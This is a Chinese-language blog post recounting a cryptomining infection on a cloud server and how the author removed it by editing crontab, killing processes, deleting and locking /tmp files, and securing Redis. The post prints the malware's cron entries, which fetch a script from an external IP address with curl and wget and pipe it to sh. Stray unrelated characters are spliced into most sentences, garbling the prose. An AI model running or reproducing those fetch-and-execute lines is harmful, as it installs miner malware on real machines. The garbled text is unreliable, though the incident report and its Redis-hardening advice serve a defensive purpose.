今天操作公司的第二臺(tái)服務(wù)器佩微,服務(wù)器是金山云的云服務(wù)器曹铃。需要用到crontab定時(shí)任務(wù)残吩,編寫(xiě)了一個(gè)命令财忽,重啟。之后再測(cè)試這條命令泣侮,然后很奇怪的是寫(xiě)進(jìn)去的crontab一會(huì)兒不存在了即彪,很是納悶,難道我忘記保存了活尊?隶校?繼續(xù)操作,然后發(fā)新寫(xiě)入的現(xiàn)定時(shí)任務(wù)又沒(méi)有了蛹锰。這就讓我產(chǎn)生了懷疑深胳,難道是金山云定制的一些功能,還是權(quán)限的問(wèn)題铜犬?
執(zhí)行crontab -l舞终,列出當(dāng)前任務(wù)
[root@vm10-0-0-3 shell]# crontab -l
*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh
*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh
還沒(méi)覺(jué)得奇怪,當(dāng)我過(guò)了一會(huì)兒再刷新任務(wù)時(shí)癣猾,發(fā)現(xiàn)任務(wù)多了一個(gè)敛劝。
[root@vm10-0-0-3 shell]# crontab -l
*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh
*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh
*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh
一開(kāi)始懷疑是云服務(wù)商的一些機(jī)制,帶著疑問(wèn)我就百度了這個(gè)地址是做什么的煎谍。
嚇到我了攘蔽,居然是病毒地址。點(diǎn)開(kāi)詳細(xì)查看了一下呐粘,確認(rèn)是病毒满俗。ip地址指向的美國(guó),百度上介紹是挖礦病毒
另外打開(kāi)了url查看了一下作岖,都是linux操作命令唆垃。
由于工作時(shí)間較少,還是頭一回遇到次問(wèn)題痘儡。趕緊解決吧
1辕万、我先是編輯crontab -e,將上述url去掉沉删。:wq保存渐尿。重啟crontab服務(wù):service crond restart。果然crontab列表中沒(méi)再次出現(xiàn)自動(dòng)增長(zhǎng)的鏈接矾瑰。
此時(shí)查看進(jìn)行砖茸,發(fā)現(xiàn)2t3ik.p程序占用cpu率已經(jīng)高達(dá)398.5%
意味著此時(shí)問(wèn)題還沒(méi)解決。
2殴穴、按照網(wǎng)上搜索網(wǎng)友回答凉夯,我進(jìn)入到/tmp文件夾下货葬,
[root@vm10-0-0-3 tmp]# cd /tmp/
[root@vm10-0-0-3 tmp]# rm -rf 2t3ik.p
[root@vm10-0-0-3 tmp]# rm -rf ddgs.3011
此時(shí),執(zhí)行top命令劲够,2t3ik.p程序cpu占用率依然沒(méi)有減少震桶。
根據(jù)上圖所屬,pid為31484征绎。執(zhí)行"kill 31484"蹲姐,殺死進(jìn)程。執(zhí)行top命令再看
PID為15505的進(jìn)程cpu占用率依然占用著炒瘸。再次執(zhí)行"kill 15509"淤堵。
此時(shí)的運(yùn)行狀態(tài)趨于正常狀態(tài)。查看了服務(wù)器近期的cpu占用率統(tǒng)計(jì)顷扩,原來(lái)這兩天cpu占用率一直高居不下拐邪。
本來(lái)以為這就好了,誰(shuí)知過(guò)了五分鐘執(zhí)行top命令隘截,這個(gè)進(jìn)程又死灰復(fù)燃了扎阶。!I舭拧东臀!
繼續(xù)kill掉pid為16160的進(jìn)程。
繼續(xù)kill掉進(jìn)行犀农,有時(shí)還會(huì)以2t3ik.m出現(xiàn)惰赋。所以
接下來(lái),進(jìn)入/tmp文件夾呵哨,執(zhí)行
cd /tmp/
rm -rf 2t3ik*? ? ? ? ? ? ? ? //刪除2t3ik文件
rm -rf ddgs*
touch 2t3ik.p? ? ? ? ? ? ? ? //自己創(chuàng)建空文件
touch 2t3ik.m? ? ? ? ? ? ? ?
touch ddgs.3011????
chattr +i 2t3ik*? ? ? ? ? ?//保護(hù)文件不被修改?
chattr +i ddgs*
相當(dāng)于自己創(chuàng)建兩個(gè)文件赁濒,并且不給與修改的權(quán)限。這樣存留在系統(tǒng)中自動(dòng)創(chuàng)建進(jìn)行會(huì)于此沖突孟害。
重啟服務(wù)器 shutdown -r now
問(wèn)題就此解決拒炎。cpu占用率再?zèng)]急速上升。
究其原因挨务,有個(gè)說(shuō)法是低版本的redis數(shù)據(jù)庫(kù)沒(méi)有設(shè)置連接密碼击你,端口6379被掃描后入侵redis漏洞所致,獲取了用戶的權(quán)限谎柄。查看了服務(wù)器監(jiān)控報(bào)表丁侄,確實(shí)發(fā)現(xiàn)是redis服務(wù)安裝之后的一天cpu開(kāi)始異常增長(zhǎng)的。建議大家如果遇到此問(wèn)題朝巫,檢查redis鸿摇,并對(duì)redis服務(wù)增設(shè)密碼,或者指定ip訪問(wèn)捍歪。防止被掃描安裝病毒程序户辱。
下面是一些相關(guān)資訊:
